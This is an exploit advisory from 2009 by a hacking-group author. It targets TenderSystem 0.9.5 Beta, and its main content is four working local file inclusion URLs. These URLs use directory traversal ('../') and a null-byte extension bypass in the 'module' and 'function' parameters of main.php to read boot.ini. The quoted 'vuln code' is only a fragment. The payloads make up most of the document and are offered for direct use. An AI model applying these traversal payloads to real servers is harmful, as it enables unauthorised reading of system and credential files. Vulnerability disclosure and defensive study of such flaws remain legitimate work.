__________ __ __ .___ __ .__ \______ \_____ ____ | | __ _____/ |_ __| _/____ _____ _/ |_| |__ | ___/\__ \ _/ ___\| |/ // __ \ __\/ __ |/ __ \\__ \\ __\ | \ | | / __ \\ \___| <\ ___/| | / /_/ \ ___/ / __ \| | | Y \ |____| (____ /\___ >__|_ \\___ >__| \____ |\___ >____ /__| |___| / \/ \/ \/ \/ \/ \/ \/ \/ ------------------------------------------------------------------------------------------- Note: TESTED LOCALLY WITH XAMPP FOR WINDOWS I was unable to get this to work on a Linux server. Further testing may be required. ------------------------------------------------------------------------------------------ Target: TenderSystem Version: 0.9.5 Beta Site http://www.tendersystem.com/ Demo: http://demo.tendersystem.com/ Date: 2-14-2009 ------------------------------------------------------------------------------------------- Author: Packetdeath Homepage: www.ssteam.ws Contact: yaii_abc@hotmail.com ------------------------------------------------------------------------------------------- Greetz: bi0, AnnexxEmpire and the rest of SSTeam.ws ------------------------------------------------------------------------------------------- Exploit: http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.html&function=login http://127.0.0.1/tendersystem/main.php?module=../../../../../../../../boot.ini%00.jpg&function=login http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.html http://127.0.0.1/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.jpg ------------------------------------------------------------------------------------------------------- Vuln code in main.php: // load required files require('modules/generic/ts_main.php'); ?> ------------------------------------------------------------------------------------------------------- Some things are better left unsaid <3 ... That is all. /Packetdeath